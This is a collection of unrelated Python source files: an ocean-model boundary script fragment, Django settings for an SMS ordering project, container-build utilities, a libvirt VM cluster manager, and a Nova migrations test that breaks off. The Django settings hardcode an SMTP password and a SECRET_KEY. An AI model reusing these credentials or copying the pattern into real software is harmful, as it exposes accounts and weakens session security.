dst_vbar_south = np.ma.masked_where(dst_grd.hgrid.mask_v[0,:] == 0, dst_vbar_south)
dst_vbar_east = np.ma.masked_where(dst_grd.hgrid.mask_v[:,-1] == 0, dst_vbar_east)
dst_vbar_west = np.ma.masked_where(dst_grd.hgrid.mask_v[:,0] == 0, dst_vbar_west)
# write data in destination file
print 'write data in destination file'
ncu.variables['ocean_time'][0] = time
ncu.variables['u_north'][0] = dst_u_north
ncu.variables['u_south'][0] = dst_u_south
ncu.variables['u_east'][0] = dst_u_east
ncu.variables['u_west'][0] = dst_u_west
ncu.variables['ubar_north'][0] = dst_ubar_north
ncu.variables['ubar_south'][0] = dst_ubar_south
ncu.variables['ubar_east'][0] = dst_ubar_east
ncu.variables['ubar_west'][0] = dst_ubar_west
ncv.variables['ocean_time'][0] = time
ncv.variables['v_north'][0] = dst_v_north
ncv.variables['v_south'][0] = dst_v_south
ncv.variables['v_east'][0] = dst_v_east
ncv.variables['v_west'][0] = dst_v_west
ncv.variables['vbar_north'][0] = dst_vbar_north
ncv.variables['vbar_south'][0] = dst_vbar_south
ncv.variables['vbar_east'][0] = dst_vbar_east
ncv.variables['vbar_west'][0] = dst_vbar_west
# close file
ncu.close()
ncv.close()
cdf.close()
|
|
# Django settings for tns_glass project.
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Nyaruka', 'code@nyaruka.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'motome.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# set the mail settings, we send through gmail
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = 'website@nyaruka.com'
DEFAULT_FROM_EMAIL = 'website@nyaruka.com'
EMAIL_HOST_PASSWORD = 'passwordpassword'
EMAIL_USE_TLS = True
EMAIL_PORT = 587
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone
TIME_ZONE = 'GMT'
USER_TIME_ZONE = 'Africa/Kigali'
MODELTRANSLATION_TRANSLATION_REGISTRY = "translation"
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# Available languages for translation
LANGUAGES = (('en_us', "English"), ('rw', "Kinyarwanda"), ('fr', "French"))
DEFAULT_LANGUAGE = "en_us"
DEFAULT_SMS_LANGUAGE = "rw"
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'bangbangrootplaydeadn7#^+-u-#1wm=y3a$-#^jps5tihx5v_@-_(kxumq_$+$5r)bxo'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.locale.LocaleMiddleware'
)
ROOT_URLCONF = 'motome.urls'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'django-cache'
}
}
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.markup',
'django.contrib.humanize',
'south',
# mo-betta permission management
'guardian',
# error logging
'raven.contrib.django',
# versioning of our data
'reversion',
# the django admin
'django.contrib.admin',
# debug!
'debug_toolbar',
# compress our CSS and js
'compressor',
# rapidsms
'rapidsms',
'rapidsms_httprouter',
# smartmin
'smartmin',
'modeltranslation',
'django_quickblocks',
# async tasks,
'djcelery',
# thumbnail
'sorl.thumbnail',
# user management
'smartmin.users',
# translation of messages
'nsms.text',
# console
'nsms.console',
# our locales model
'locales',
# stores
'stores',
# products
'products',
# orders
'orders',
# customers
'customers',
# landmarks
'landmarks',
# transactions
'transactions',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'INFO',
'class':'logging.StreamHandler',
'formatter': 'verbose'
}
},
'loggers': {
'httprouterthread': {
'handlers': ['console'],
'level': 'INFO',
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
#-----------------------------------------------------------------------------------
# Directory Configuration
#-----------------------------------------------------------------------------------
import os
PROJECT_DIR = os.path.join(os.path.abspath(os.path.dirname(__file__)))
RESOURCES_DIR = os.path.join(PROJECT_DIR, '../resources')
FIXTURE_DIRS = (os.path.join(PROJECT_DIR, '../fixtures'),)
TESTFILES_DIR = os.path.join(PROJECT_DIR, '../testfiles')
TEMPLATE_DIRS = (os.path.join(PROJECT_DIR, '../templates'),)
STATICFILES_DIRS = (os.path.join(PROJECT_DIR, '../static'), os.path.join(PROJECT_DIR, '../media'), )
STATIC_ROOT = os.path.join(PROJECT_DIR, '../sitestatic')
MEDIA_ROOT = os.path.join(PROJECT_DIR, '../media')
MEDIA_URL = "/media/"
#-----------------------------------------------------------------------------------
# Permission Management
#-----------------------------------------------------------------------------------
# this lets us easily create new permissions across our objects
PERMISSIONS = {
'*': ('create', # can create an object
          'read', # can read an object, viewing its details
'update', # can update an object
'delete', # can delete an object,
'list'), # can view a list of the objects
# Add new object level permissions here:
# 'subjects.subject': ('csv', 'delivered', 'stopped'),
}
# assigns the permissions that each group should have
GROUP_PERMISSIONS = {
"Administrators": (
'auth.user.*',
'rapidsms_httprouter.message.*',
),
"Editors": [],
"Viewers": []
}
#-----------------------------------------------------------------------------------
# Login / Logout
#-----------------------------------------------------------------------------------
LOGIN_URL = "/users/login/"
LOGOUT_URL = "/users/logout/"
LOGIN_REDIRECT_URL = "/"
#-----------------------------------------------------------------------------------
# Guardian Configuration
#-----------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'guardian.backends.ObjectPermissionBackend',
)
ANONYMOUS_USER_ID = -1
#-----------------------------------------------------------------------------------
# Async tasks with django-celery
#-----------------------------------------------------------------------------------
import djcelery
djcelery.setup_loader()
CELERY_RESULT_BACKEND = 'database'
BROKER_BACKEND = 'redis'
BROKER_HOST = 'localhost'
BROKER_PORT = 6379
BROKER_VHOST = '10'
REDIS_PORT=6379
REDIS_HOST='localhost'
REDIS_DB=10
#-----------------------------------------------------------------------------------
# Django-Nose config
#-----------------------------------------------------------------------------------
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
SOUTH_TESTS_MIGRATE = False
#-----------------------------------------------------------------------------------
# SMS Configs
#-----------------------------------------------------------------------------------
RAPIDSMS_TABS = []
SMS_APPS = ['public']
# change this to your specific backend for your install
DEFAULT_BACKEND = "console"
# change this to the country code for your install
DEFAULT_COUNTRY_CODE = "250"
#-----------------------------------------------------------------------------------
# Debug Toolbar
#-----------------------------------------------------------------------------------
INTERNAL_IPS = ('127.0.0.1',)
#-----------------------------------------------------------------------------------
# Crontab Settings .. uncomment if you want to use Celery's crontab-like
# functionality.
#-----------------------------------------------------------------------------------
from datetime import timedelta
CELERYBEAT_SCHEDULE = {
"runs-every-five-minutes": {
'task': 'rapidsms_httprouter.tasks.resend_errored_messages_task',
'schedule': timedelta(minutes=5),
},
}
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False
}
|
|
"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
from __future__ import print_function, unicode_literals
import json
import os
from pipes import quote
import re
import shlex
import shutil
import subprocess
import tempfile
import logging
import uuid
from atomic_reactor.constants import DOCKERFILE_FILENAME, PY2
logger = logging.getLogger(__name__)
class ImageName(object):
def __init__(self, registry=None, namespace=None, repo=None, tag=None):
self.registry = registry
self.namespace = namespace
self.repo = repo
self.tag = tag
@classmethod
def parse(cls, image_name):
result = cls()
# registry.org/namespace/repo:tag
s = image_name.split('/', 2)
if len(s) == 2:
if '.' in s[0] or ':' in s[0]:
result.registry = s[0]
else:
result.namespace = s[0]
elif len(s) == 3:
result.registry = s[0]
result.namespace = s[1]
if result.namespace == 'library':
# https://github.com/projectatomic/atomic-reactor/issues/45
logger.debug("namespace 'library' -> ''")
result.namespace = None
result.repo = s[-1]
try:
result.repo, result.tag = result.repo.rsplit(':', 1)
except ValueError:
pass
return result
def to_str(self, registry=True, tag=True, explicit_tag=False,
explicit_namespace=False):
if self.repo is None:
raise RuntimeError('No image repository specified')
result = self.repo
if tag and self.tag:
result = '{0}:{1}'.format(result, self.tag)
elif tag and explicit_tag:
result = '{0}:{1}'.format(result, 'latest')
if self.namespace:
result = '{0}/{1}'.format(self.namespace, result)
elif explicit_namespace:
result = '{0}/{1}'.format('library', result)
if registry and self.registry:
result = '{0}/{1}'.format(self.registry, result)
return result
@property
def pulp_repo(self):
return self.to_str(registry=False, tag=False).replace("/", "-")
def __str__(self):
return self.to_str(registry=True, tag=True)
def __repr__(self):
return "ImageName(image=%s)" % repr(self.to_str())
def __eq__(self, other):
return type(self) == type(other) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(self.to_str())
def copy(self):
return ImageName(
registry=self.registry,
namespace=self.namespace,
repo=self.repo,
tag=self.tag)
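# Illustrative round trip through ImageName (hypothetical image reference):
#   img = ImageName.parse("registry.example.com/myorg/myrepo:1.0")
#   img.registry == "registry.example.com", img.namespace == "myorg"
#   img.repo == "myrepo", img.tag == "1.0"
#   img.to_str() == "registry.example.com/myorg/myrepo:1.0"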
def figure_out_dockerfile(absolute_path, local_path=None):
"""
try to figure out dockerfile from provided path and optionally from relative local path
this is meant to be used with git repo: absolute_path is path to git repo,
local_path is path to dockerfile within git repo
:param absolute_path:
:param local_path:
:return: tuple, (dockerfile_path, dir_with_dockerfile_path)
"""
logger.info("searching for dockerfile in '%s' (local path %s)", absolute_path, local_path)
logger.debug("abs path = '%s', local path = '%s'", absolute_path, local_path)
if local_path:
if local_path.endswith(DOCKERFILE_FILENAME):
git_df_dir = os.path.dirname(local_path)
df_dir = os.path.abspath(os.path.join(absolute_path, git_df_dir))
else:
df_dir = os.path.abspath(os.path.join(absolute_path, local_path))
else:
df_dir = os.path.abspath(absolute_path)
if not os.path.isdir(df_dir):
raise IOError("Directory '%s' doesn't exist." % df_dir)
df_path = os.path.join(df_dir, DOCKERFILE_FILENAME)
if not os.path.isfile(df_path):
raise IOError("Dockerfile '%s' doesn't exist." % df_path)
logger.debug("Dockerfile found: '%s'", df_path)
return df_path, df_dir
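# Sketch of the expected call/return shape (paths are hypothetical; both the
# directory and the Dockerfile must exist or IOError is raised):
#   df_path, df_dir = figure_out_dockerfile('/work/repo', 'image/Dockerfile')
#   -> ('/work/repo/image/Dockerfile', '/work/repo/image')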
class CommandResult(object):
def __init__(self, logs, error=None, error_detail=None):
self._logs = logs
self._error = error
self._error_detail = error_detail
@property
def logs(self):
return self._logs
@property
def error(self):
return self._error
@property
def error_detail(self):
return self._error_detail
def is_failed(self):
return bool(self.error) or bool(self.error_detail)
def wait_for_command(logs_generator):
"""
using given generator, wait for it to raise StopIteration, which
indicates that docker has finished with processing
    :return: CommandResult, wrapping the accumulated logs and any error
"""
# FIXME: this function is getting pretty big, let's break it down a bit
# and merge it into CommandResult
logger.info("wait_for_command")
logs = []
error = None
error_message = None
while True:
try:
parsed_item = None
item = next(logs_generator) # py2 & 3 compat
item = item.decode("utf-8")
try:
parsed_item = json.loads(item)
except ValueError:
pass
# make sure the json is an object
if isinstance(parsed_item, dict):
line = parsed_item.get("stream", "")
else:
parsed_item = None
line = item
            for l in re.split(r"\r?\n", line):
# line = line.replace("\r\n", " ").replace("\n", " ").strip()
l = l.strip()
if l:
logger.debug(l)
logs.append(item)
if parsed_item is not None:
error = parsed_item.get("error", None)
error_message = parsed_item.get("errorDetail", None)
if error:
logger.error(item.strip())
except StopIteration:
logger.info("no more logs")
break
cr = CommandResult(logs=logs, error=error, error_detail=error_message)
return cr
def backported_check_output(*popenargs, **kwargs):
"""
Run command with arguments and return its output as a byte string.
Backported from Python 2.7 as it's implemented as pure python on stdlib.
https://gist.github.com/edufelipe/1027906
"""
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, _ = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
error = subprocess.CalledProcessError(retcode, cmd)
error.output = output
raise error
return output
def clone_git_repo(git_url, target_dir, commit=None):
"""
clone provided git repo to target_dir, optionally checkout provided commit
:param git_url: str, git repo to clone
:param target_dir: str, filesystem path where the repo should be cloned
:param commit: str, commit to checkout, SHA-1 or ref
:return: str, commit ID of HEAD
"""
commit = commit or "master"
logger.info("cloning git repo '%s'", git_url)
logger.debug("url = '%s', dir = '%s', commit = '%s'",
git_url, target_dir, commit)
# http://stackoverflow.com/questions/1911109/clone-a-specific-git-branch/4568323#4568323
# -b takes only refs, not SHA-1
cmd = ["git", "clone", "-b", commit, "--single-branch", git_url, quote(target_dir)]
logger.debug("cloning single branch '%s'", cmd)
try:
subprocess.check_call(cmd)
except subprocess.CalledProcessError as ex:
logger.warning(repr(ex))
# let's try again with plain `git clone $url && git checkout`
cmd = ["git", "clone", git_url, quote(target_dir)]
logger.debug("cloning '%s'", cmd)
subprocess.check_call(cmd)
cmd = ["git", "reset", "--hard", commit]
logger.debug("checking out branch '%s'", cmd)
subprocess.check_call(cmd, cwd=target_dir)
cmd = ["git", "rev-parse", "HEAD"]
logger.debug("getting SHA-1 of provided ref '%s'", cmd)
try:
commit_id = subprocess.check_output(cmd, cwd=target_dir) # py 2.7
except AttributeError:
commit_id = backported_check_output(cmd, cwd=target_dir) # py 2.6
commit_id = commit_id.strip()
logger.info("commit ID = %s", commit_id)
return commit_id
class LazyGit(object):
"""
usage:
lazy_git = LazyGit(git_url="...")
with lazy_git:
        lazy_git.git_path
or
lazy_git = LazyGit(git_url="...", tmpdir=tmp_dir)
lazy_git.git_path
"""
def __init__(self, git_url, commit=None, tmpdir=None):
self.git_url = git_url
# provided commit ID/reference to check out
self.commit = commit
# commit ID of HEAD; we'll figure this out ourselves
self._commit_id = None
self.provided_tmpdir = tmpdir
self._git_path = None
@property
def _tmpdir(self):
return self.provided_tmpdir or self.our_tmpdir
@property
def commit_id(self):
return self._commit_id
@property
def git_path(self):
if self._git_path is None:
self._commit_id = clone_git_repo(self.git_url, self._tmpdir, self.commit)
self._git_path = self._tmpdir
return self._git_path
def __enter__(self):
if not self.provided_tmpdir:
self.our_tmpdir = tempfile.mkdtemp()
def __exit__(self, exc_type, exc_val, exc_tb):
if not self.provided_tmpdir:
if self.our_tmpdir:
shutil.rmtree(self.our_tmpdir)
def escape_dollar(v):
try:
str_type = unicode
except NameError:
str_type = str
if isinstance(v, str_type):
return v.replace('$', r'\$')
else:
return v
def render_yum_repo(repo, escape_dollars=True):
repo.setdefault("name", str(uuid.uuid4().hex[:6]))
repo_name = repo["name"]
logger.info("rendering repo '%s'", repo_name)
rendered_repo = '[%s]\n' % repo_name
for key, value in repo.items():
if escape_dollars:
value = escape_dollar(value)
rendered_repo += "%s=%s\n" % (key, value)
logger.info("rendered repo: %s", repr(rendered_repo))
return rendered_repo
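# Example of the rendered output for a hypothetical repo dict (dict key order
# may vary):
#   render_yum_repo({'name': 'extras', 'baseurl': 'http://example.com/repo'})
#   -> '[extras]\nname=extras\nbaseurl=http://example.com/repo\n'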
def process_substitutions(mapping, substitutions):
"""Process `substitutions` for given `mapping` (modified in place)
:param mapping: a dict
:param substitutions: either a dict {key: value} or a list of ["key=value"] strings
keys can use dotted notation to change to nested dicts
Note: Plugin substitutions are processed differently - they are accepted in form of
plugin_type.plugin_name.arg_name, even though that doesn't reflect the actual
structure of given mapping.
Also note: For non-plugin substitutions, additional dicts/key/value pairs
are created on the way if they're missing. For plugin substitutions, only
existing values can be changed (TODO: do we want to change this behaviour?).
"""
def parse_val(v):
# TODO: do we need to recognize numbers,lists,dicts?
if v.lower() == 'true':
return True
elif v.lower() == 'false':
return False
elif v.lower() == 'none':
return None
return v
if isinstance(substitutions, list):
# if we got a list, get a {key: val} dict out of it
substitutions = dict([s.split('=', 1) for s in substitutions])
for key, val in substitutions.items():
cur_dict = mapping
key_parts = key.split('.')
if key_parts[0].endswith('_plugins'):
_process_plugin_substitution(mapping, key_parts, val)
else:
key_parts_without_last = key_parts[:-1]
# now go down mapping, following the dotted path; create empty dicts on way
for k in key_parts_without_last:
if k in cur_dict:
if not isinstance(cur_dict[k], dict):
cur_dict[k] = {}
else:
cur_dict[k] = {}
cur_dict = cur_dict[k]
cur_dict[key_parts[-1]] = parse_val(val)
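# Sketch of a non-plugin dotted-path substitution on a hypothetical mapping:
#   cfg = {'build': {'arch': 'x86_64'}}
#   process_substitutions(cfg, ['build.arch=aarch64', 'build.squash=true'])
#   # cfg is now {'build': {'arch': 'aarch64', 'squash': True}}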
def _process_plugin_substitution(mapping, key_parts, value):
try:
plugin_type, plugin_name, arg_name = key_parts
except ValueError:
logger.error("invalid absolute path '{0}': it requires exactly three parts: "
"plugin type, plugin name, argument name (dot separated)".format(key_parts))
raise ValueError("invalid absolute path to plugin, it should be "
"plugin_type.plugin_name.argument_name")
logger.debug("getting plugin conf for '%s' with type '%s'",
plugin_name, plugin_type)
plugins_of_a_type = mapping.get(plugin_type, None)
if plugins_of_a_type is None:
logger.warning("there are no plugins with type '%s'",
plugin_type)
return
plugin_conf = [x for x in plugins_of_a_type if x['name'] == plugin_name]
plugins_num = len(plugin_conf)
if plugins_num == 1:
if arg_name not in plugin_conf[0]['args']:
logger.warning("no configuration value '%s' for plugin '%s', skipping",
arg_name, plugin_name)
return
logger.info("changing value '%s' of plugin '%s': '%s' -> '%s'",
arg_name, plugin_name, plugin_conf[0]['args'][arg_name], value)
plugin_conf[0]['args'][arg_name] = value
elif plugins_num <= 0:
logger.warning("there is no configuration for plugin '%s', skipping substitution",
plugin_name)
else:
logger.error("there is no configuration for plugin '%s'",
plugin_name)
raise RuntimeError("plugin '%s' was specified multiple (%d) times, can't pick one",
plugin_name, plugins_num)
|
|
import libvirt
import os
import string
import uuid
import xml.etree.ElementTree as ET
from cephlvc.network import ArpScraper
class Domain(object):
def __init__(self, virDomain):
self.domain = virDomain
def __getattr__(self, attr_name):
        if hasattr(self.domain, attr_name):
            return getattr(self.domain, attr_name)
        raise AttributeError(attr_name)
def disk_count(self, bus=None):
targets = self.etree.findall('*/disk/target')
if not bus:
return len(targets)
count = 0
for target in targets:
if target.attrib['bus'] == bus:
count += 1
return count
@property
def etree(self):
return ET.fromstring(self.domain.XMLDesc())
@property
def volume_paths(self):
paths = []
etree = self.etree
for source in etree.findall('*/disk/source'):
paths.append(source.attrib['file'])
return paths
class Cluster(object):
def __init__(self, name, template_domain_name, virtcon):
self.name = name
self.template_domain_name = template_domain_name
self.virtcon = virtcon
def add_domain(self, data_volume_count=0, data_volume_size=0):
new_name = self.next_domain_name()
etree = self.template_domain.etree
source_volume_element = etree.find('*/disk/source')
source_volume_path = source_volume_element.attrib['file']
source_volume = self.virtcon.storageVolLookupByPath(source_volume_path)
volume = self.duplicate_volume(source_volume, "%s.img" % new_name)
domain = self.create_domain(new_name, self.template_domain.etree, volume)
disk_offset = domain.disk_count('virtio')
for x in range(0, data_volume_count):
vol_name = "%s-data-%02d.img" % (new_name, x)
dev_id = "vd%s" % string.ascii_lowercase[x + disk_offset]
volume = self.create_volume(vol_name, data_volume_size)
self.add_volume_to_domain(domain, volume, dev_id)
return domain
def add_volume_to_domain(self, domain, volume, dev_id):
xml = """
<disk type='file' device='disk'>
<driver name='qemu' type='qcow2'/>
<source file='%s'/>
<target dev='%s' bus='virtio'/>
</disk>""" % (volume.path(), dev_id)
domain.attachDeviceFlags(xml, libvirt.VIR_DOMAIN_AFFECT_CONFIG)
def create_domain(self, name, template_etree, source_volume):
etree = template_etree
etree.find("uuid").text = str(uuid.uuid4())
etree.find("name").text = name
source_volume_element = etree.find('*/disk/source')
source_volume_element.attrib['file'] = source_volume.path()
for mac in etree.findall('*/interface/mac'):
mac.attrib['address'] = self.next_mac_address()
return Domain(self.virtcon.defineXML(ET.tostring(etree)))
def create_volume(self, name, size, pool=None):
if not pool:
pool = self.virtcon.listAllStoragePools()[0]
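        # the capacity below is declared in bytes; `size` appears to be given
        # in MiB, hence the size * 1024 * 1024 conversion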
xml = """
<volume type='file'>
<name>%s</name>
<capacity unit='bytes'>%d</capacity>
<allocation unit='bytes'>0</allocation>
<target>
<format type='qcow2'/>
</target>
</volume>
""" % (name, size * 1024 * 1024)
volume = pool.createXML(xml)
return volume
def destroy_all(self):
for d in self.domains:
self.destroy_domain(d, and_volumes=True)
def destroy_domain(self, domain, and_volumes=True):
# preloading paths because we can't get them from the domain
# once undefine is called
paths = domain.volume_paths
if domain.isActive():
domain.destroy()
domain.undefine()
if and_volumes:
for path in paths:
self.destroy_volume(path)
def destroy_volume(self, volume):
volume = self.load_volume(volume)
volume.delete()
def detach_volume(self, domain, volume):
pass
@property
def domains(self):
return [Domain(d) for d in self.virtcon.listAllDomains() if d.name().startswith(self.name)]
def duplicate_volume(self, volume, new_name):
volume = self.load_volume(volume)
template_name = volume.name()
pool = volume.storagePoolLookupByVolume()
new_xml = volume.XMLDesc().replace(template_name, new_name)
new_vol = pool.createXMLFrom(new_xml, volume)
return new_vol
def load_volume(self, volume):
if isinstance(volume, libvirt.virStorageVol):
return volume
if isinstance(volume, str):
volume_name = volume
volume = None
if volume_name.find(os.path.sep) == 0:
volume = self.virtcon.storageVolLookupByPath(volume_name)
else:
for pool in self.virtcon.listAllStoragePools():
for v in pool.listAllVolumes():
if v.name() == volume_name:
volume = v
break
return volume
def max_mac_address(self):
max_mac = 0
for d in [Domain(d) for d in self.virtcon.listAllDomains()]:
etree = d.etree
for mac in etree.findall('*/interface/mac'):
addr = int(mac.attrib['address'].replace(':', ''), 16)
if addr > max_mac:
max_mac = addr
max_mac = "%012x" % max_mac
max_mac = ":".join(max_mac[i:i+2] for i in range(0, 12, 2))
return max_mac
def next_mac_address(self, mac=None):
if mac is None:
mac = self.max_mac_address()
newmac = '%012x' % (int(mac.replace(':', ''), 16) + 1)
return ":".join(newmac[i:i+2] for i in range(0, 12, 2))
def next_domain_name(self):
return "%s-%02d" % (self.name, len(self.domains))
def print_ip_addresses(self):
mac_to_domain = {}
macs = []
for d in self.domains:
etree = d.etree
for mac in etree.findall('*/interface/mac'):
mac_to_domain[mac.attrib['address']] = d.name()
macs.append(mac.attrib['address'])
arp_scraper = ArpScraper()
addresses = arp_scraper.ip_lookup(macs)
for mac, ip in addresses:
print "%s %s" % (ip, mac_to_domain[mac])
def power_off(self):
for d in self.domains:
d.shutdown()
def power_on(self):
for d in self.domains:
d.create()
@property
def template_domain(self):
return Domain(self.virtcon.lookupByName(self.template_domain_name))
|
|
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import iso8601
import mock
from oslo_utils.fixture import uuidsentinel as uuids
import six
from webob import exc
from nova.api.openstack.compute import migrations as migrations_v21
from nova import context
from nova import exception
from nova import objects
from nova.objects import base
from nova import test
from nova.tests.unit.api.openstack import fakes
fake_migrations = [
# in-progress live migration
{
'id': 1,
'source_node': 'node1',
'dest_node': 'node2',
'source_compute': 'compute1',
'dest_compute': 'compute2',
'dest_host': '1.2.3.4',
'status': 'running',
'instance_uuid': uuids.instance1,
'old_instance_type_id': 1,
'new_instance_type_id': 2,
'migration_type': 'live-migration',
'hidden': False,
'memory_total': 123456,
'memory_processed': 12345,
'memory_remaining': 111111,
'disk_total': 234567,
'disk_processed': 23456,
'disk_remaining': 211111,
'created_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'deleted_at': None,
'deleted': False,
'uuid': uuids.migration1,
'cross_cell_move': False,
'user_id': None,
'project_id': None
},
# non in-progress live migration
{
'id': 2,
'source_node': 'node1',
'dest_node': 'node2',
'source_compute': 'compute1',
'dest_compute': 'compute2',
'dest_host': '1.2.3.4',
'status': 'error',
'instance_uuid': uuids.instance1,
'old_instance_type_id': 1,
'new_instance_type_id': 2,
'migration_type': 'live-migration',
'hidden': False,
'memory_total': 123456,
'memory_processed': 12345,
'memory_remaining': 111111,
'disk_total': 234567,
'disk_processed': 23456,
'disk_remaining': 211111,
'created_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'deleted_at': None,
'deleted': False,
'uuid': uuids.migration2,
'cross_cell_move': False,
'user_id': None,
'project_id': None
},
# in-progress resize
{
'id': 4,
'source_node': 'node10',
'dest_node': 'node20',
'source_compute': 'compute10',
'dest_compute': 'compute20',
'dest_host': '5.6.7.8',
'status': 'migrating',
'instance_uuid': uuids.instance2,
'old_instance_type_id': 5,
'new_instance_type_id': 6,
'migration_type': 'resize',
'hidden': False,
'memory_total': 456789,
'memory_processed': 56789,
'memory_remaining': 45000,
'disk_total': 96789,
'disk_processed': 6789,
'disk_remaining': 96000,
'created_at': datetime.datetime(2013, 10, 22, 13, 42, 2),
'updated_at': datetime.datetime(2013, 10, 22, 13, 42, 2),
'deleted_at': None,
'deleted': False,
'uuid': uuids.migration3,
'cross_cell_move': False,
'user_id': None,
'project_id': None
},
# non in-progress resize
{
'id': 5,
'source_node': 'node10',
'dest_node': 'node20',
'source_compute': 'compute10',
'dest_compute': 'compute20',
'dest_host': '5.6.7.8',
'status': 'error',
'instance_uuid': uuids.instance2,
'old_instance_type_id': 5,
'new_instance_type_id': 6,
'migration_type': 'resize',
'hidden': False,
'memory_total': 456789,
'memory_processed': 56789,
'memory_remaining': 45000,
'disk_total': 96789,
'disk_processed': 6789,
'disk_remaining': 96000,
'created_at': datetime.datetime(2013, 10, 22, 13, 42, 2),
'updated_at': datetime.datetime(2013, 10, 22, 13, 42, 2),
'deleted_at': None,
'deleted': False,
'uuid': uuids.migration4,
'cross_cell_move': False,
'user_id': None,
'project_id': None
}
]
migrations_obj = base.obj_make_list(
'fake-context',
objects.MigrationList(),
objects.Migration,
fake_migrations)
class FakeRequest(object):
environ = {"nova.context": context.RequestContext('fake_user',
fakes.FAKE_PROJECT_ID,
is_admin=True)}
GET = {}
class MigrationsTestCaseV21(test.NoDBTestCase):
migrations = migrations_v21
def _migrations_output(self):
return self.controller._output(self.req, migrations_obj)
def setUp(self):
"""Run before each test."""
super(MigrationsTestCaseV21, self).setUp()
self.controller = self.migrations.MigrationsController()
self.req = fakes.HTTPRequest.blank('', use_admin_context=True)
self.context = self.req.environ['nova.context']
def test_index(self):
migrations_in_progress = {'migrations': self._migrations_output()}
for mig in migrations_in_progress['migrations']:
self.assertIn('id', mig)
self.assertNotIn('deleted', mig)
self.assertNotIn('deleted_at', mig)
self.assertNotIn('links', mig)
filters = {'host': 'host1', 'status': 'migrating',
'instance_uuid': uuids.instance1,
